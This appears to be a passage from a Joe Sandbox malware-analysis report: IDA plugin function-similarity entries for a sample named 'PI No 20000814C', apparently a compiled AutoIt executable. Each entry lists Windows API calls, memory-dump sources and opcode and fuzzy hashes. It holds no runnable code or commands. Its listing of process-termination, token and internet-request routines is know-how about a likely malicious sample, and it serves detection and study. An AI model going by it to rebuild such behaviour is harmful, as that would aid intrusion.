                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 740a1dda3f43289039f7c63cc1a933d8034a8de959e3d6871d1394814c151cec
                                    • Instruction ID: b8d01bde09956410e05fd87caf26f1128bfc38ef79929fd6fb6fb08e682bd2c1
                                    • Opcode Fuzzy Hash: 740a1dda3f43289039f7c63cc1a933d8034a8de959e3d6871d1394814c151cec
                                    • Instruction Fuzzy Hash: CB31A372508319AFD720DF54DC49EAABBE9FF88314F00491AF589A7191DB30E9189B92
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5E0FA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5E120
                                    • SysAllocString.OLEAUT32(00000000), ref: 00F5E123
                                    • SysAllocString.OLEAUT32 ref: 00F5E144
                                    • SysFreeString.OLEAUT32 ref: 00F5E14D
                                    • SysAllocString.OLEAUT32(?), ref: 00F5E175
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$Free
                                    • String ID:
                                    • API String ID: 1313759350-0
                                    • Opcode ID: add3ce10c170a80603ecc90db57af4e0acd89432a4c65367b121ca3ad4f0e743
                                    • Instruction ID: 9a36128d2611eedf5c1c424bee7b814981a755bde9474863e26c1e933bde7d76
                                    • Opcode Fuzzy Hash: add3ce10c170a80603ecc90db57af4e0acd89432a4c65367b121ca3ad4f0e743
                                    • Instruction Fuzzy Hash: 1E21A472600508AF9B14DFA8DC88DBB77ECEB09761B108125FE54CB2A1DA70DD45AB64
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • _wcstok.LIBCMT ref: 00F6EEFF
                                    • _wcscpy.LIBCMT ref: 00F6EF8E
                                    • _memset.LIBCMT ref: 00F6EFC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: 542898fc8345be87d85f4938cd71afbac4f5aa432db2e5ff577c39f179e91c4e
                                    • Instruction ID: a93476d15aac112f06cf49ddfef723912468b8ab7bcca0600f10e7b5ea527a73
                                    • Opcode Fuzzy Hash: 542898fc8345be87d85f4938cd71afbac4f5aa432db2e5ff577c39f179e91c4e
                                    • Instruction Fuzzy Hash: 4EC181759083009FC724EF24DC85A5AB7E4FF85310F04496DF899972A2DB74ED49EB82
                                    APIs
                                      • Part of subcall function 00F585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F58608
                                      • Part of subcall function 00F585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F58612
                                      • Part of subcall function 00F585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F58621
                                      • Part of subcall function 00F585F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F58628
                                      • Part of subcall function 00F585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F5863E
                                    • GetLengthSid.ADVAPI32(?,00000000,00F58977), ref: 00F58DAC
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F58DB8
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F58DBF
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F58DD8
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F58977), ref: 00F58DEC
                                    • HeapFree.KERNEL32(00000000), ref: 00F58DF3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 169236558-0
                                    • Opcode ID: c457a061a61656ea9fa4ee47c4ce451436bd07e09fe067c339bbe41b27e42872
                                    • Instruction ID: f315d1961e233e1cdd76dbcfd01bfd5c35c15859c95a02dbcfbcc73a61619da8
                                    • Opcode Fuzzy Hash: c457a061a61656ea9fa4ee47c4ce451436bd07e09fe067c339bbe41b27e42872
                                    • Instruction Fuzzy Hash: 1211EE32900608FFDB109FA4CC09BFE7BB9EF553A6F104029ED45A3251DB329909EB60
                                    APIs
                                      • Part of subcall function 00F012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0135C
                                      • Part of subcall function 00F012F3: BeginPath.GDI32(?), ref: 00F01373
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F8C1C4
                                    • LineTo.GDI32(00000000,00000003,?), ref: 00F8C1D8
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F8C1E6
                                    • LineTo.GDI32(00000000,00000000,?), ref: 00F8C1F6
                                    • EndPath.GDI32(00000000), ref: 00F8C206
                                    • StrokePath.GDI32(00000000), ref: 00F8C216
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 3a84b5319dfb808ecc0c2ffd57bc76cd93d25c69da616e24f5cbae9a2c2b8b58
                                    • Instruction ID: d973ac7477b69abb1b155fb3b162edd9a311fbc2fe94e9b04838caf9b8380a62
                                    • Opcode Fuzzy Hash: 3a84b5319dfb808ecc0c2ffd57bc76cd93d25c69da616e24f5cbae9a2c2b8b58
                                    • Instruction Fuzzy Hash: 55111B7640410CBFDF119F90DC88EEA7FADFF08364F048021BA188A1A1C7729D59EBA0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F203D3
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F203DB
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F203E6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F203F1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F203F9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F20401
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
                                    • Instruction ID: b63b1ed99d3558e57c06ccf037da18100162a780460c0466a8eff19ff6934dc8
                                    • Opcode Fuzzy Hash: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
                                    • Instruction Fuzzy Hash: 19016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A868CBE5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6569B
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F656B1
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F656C0
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656CF
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656D9
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
                                    • Instruction ID: 9efb889c484b263c96fc16c259a45d585149f4ab23f2a19f713bd887f73cce84
                                    • Opcode Fuzzy Hash: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
                                    • Instruction Fuzzy Hash: 5CF01D3264155CBFE7215BA2DC0DEFB7A7CEFCAB11F000269FA05D1050E6A11A15A7B5
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F674E5
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F674F6
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00F11044,?,?), ref: 00F67503
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F11044,?,?), ref: 00F67510
                                      • Part of subcall function 00F66ED7: CloseHandle.KERNEL32(00000000,?,00F6751D,?,00F11044,?,?), ref: 00F66EE1
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67523
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F6752A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
                                    • Instruction ID: 89ab7746eec3923224ce1f9b5fde64039781b5925eee1dfdd5f7bce70a302a51
                                    • Opcode Fuzzy Hash: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
                                    • Instruction Fuzzy Hash: 4CF05E3A540716EFDB112B64FC8C9FB772AEF45312B140572F203910B0DB795815EB50
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F78928
                                    • CharUpperBuffW.USER32(?,?), ref: 00F78A37
                                    • VariantClear.OLEAUT32(?), ref: 00F78BAF
                                      • Part of subcall function 00F67804: VariantInit.OLEAUT32(00000000), ref: 00F67844
                                      • Part of subcall function 00F67804: VariantCopy.OLEAUT32(00000000,?), ref: 00F6784D
                                      • Part of subcall function 00F67804: VariantClear.OLEAUT32(00000000), ref: 00F67859
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: d41d8fc4789548f208366f376dd38497ab2029680152414dd1dfd731b52fe364
                                    • Instruction ID: 24ab2d4d106e53c8fbd73e060d1e021a2ac2c5fbb914b94bffb06be45e00dd75
                                    • Opcode Fuzzy Hash: d41d8fc4789548f208366f376dd38497ab2029680152414dd1dfd731b52fe364
                                    • Instruction Fuzzy Hash: 789162716083019FC710DF28C88495ABBF4EFC9754F14896EF89A8B362DB35D906EB52
                                    APIs
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • _memset.LIBCMT ref: 00F63077
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F630A6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F63159
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F63187
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: 4f238705f7bd016ea399a86ec809d367b83224e5d2604f2e955aace2604881f1
                                    • Instruction ID: 402849564ea6816b1b081f713df55523579260ea3823a7faf23b0ab954666d8d
                                    • Opcode Fuzzy Hash: 4f238705f7bd016ea399a86ec809d367b83224e5d2604f2e955aace2604881f1
                                    • Instruction Fuzzy Hash: F751C031E08301AED7259F28DD45A6BBBE8EF56324F04092DF895D31D1DB74CA48B792
                                    APIs
                                    • _memset.LIBCMT ref: 00F62CAF
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F62CCB
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F62D11
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FC6890,00000000), ref: 00F62D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
                                    • Instruction ID: 7ed42778ce960bc0a8bb7678429b59201292fceb6bb2087f19321bfafc045168
                                    • Opcode Fuzzy Hash: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
                                    • Instruction Fuzzy Hash: 6041EF306047029FD760DF24CC80B6ABBE8EF85320F14462EF865972E1D774E904DBA2
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7DAD9
                                      • Part of subcall function 00F079AB: _memmove.LIBCMT ref: 00F079F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharLower_memmove
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 3425801089-567219261
                                    • Opcode ID: fc439269c70506c5bffa65efbbe5f282b0b41188a12fb701e5c4af1cb3ea8b04
                                    • Instruction ID: 7640778bca2cdba5954ab4e046531d8729eff3f7192a78619fdc13cfc79407c0
                                    • Opcode Fuzzy Hash: fc439269c70506c5bffa65efbbe5f282b0b41188a12fb701e5c4af1cb3ea8b04
                                    • Instruction Fuzzy Hash: A131CB7190421A9FCF00EF54CC819FEB3B4FF45720B50865AE865976D2DB75A905EF80
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F593F6
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F59409
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F59439
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    • Opcode ID: a97bf65dc2bb82c5b103eaedb09e810bbf075b39e15781855fea484b650796ce
                                    • Instruction ID: f8794a3e7e742ce82ca63e5f7338727525a506009009d38bcaf24813528c5af8
                                    • Opcode Fuzzy Hash: a97bf65dc2bb82c5b103eaedb09e810bbf075b39e15781855fea484b650796ce
                                    • Instruction Fuzzy Hash: E8210471E04108AEDB18AB70DC858FFB76CDF05320B108119FA21971E1DB785D0EBA20
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F71B40
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71B66
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F71B96
                                    • InternetCloseHandle.WININET(00000000), ref: 00F71BDD
                                      • Part of subcall function 00F72777: GetLastError.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F7278C
                                      • Part of subcall function 00F72777: SetEvent.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F727A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 6009f4077baeae80538ca21e28d1d48cbf5bd64dc176a35225bd9f0a92bf8cec
                                    • Instruction ID: da4ed5740287845460f0997d996f6baf7e55cdfbc1d91728b07b1ae7af74f30a
                                    • Opcode Fuzzy Hash: 6009f4077baeae80538ca21e28d1d48cbf5bd64dc176a35225bd9f0a92bf8cec
                                    • Instruction Fuzzy Hash: C82162B160020CBFEB159F689C85EBF76ECFB89754F10812BF549A6240EB249D096762
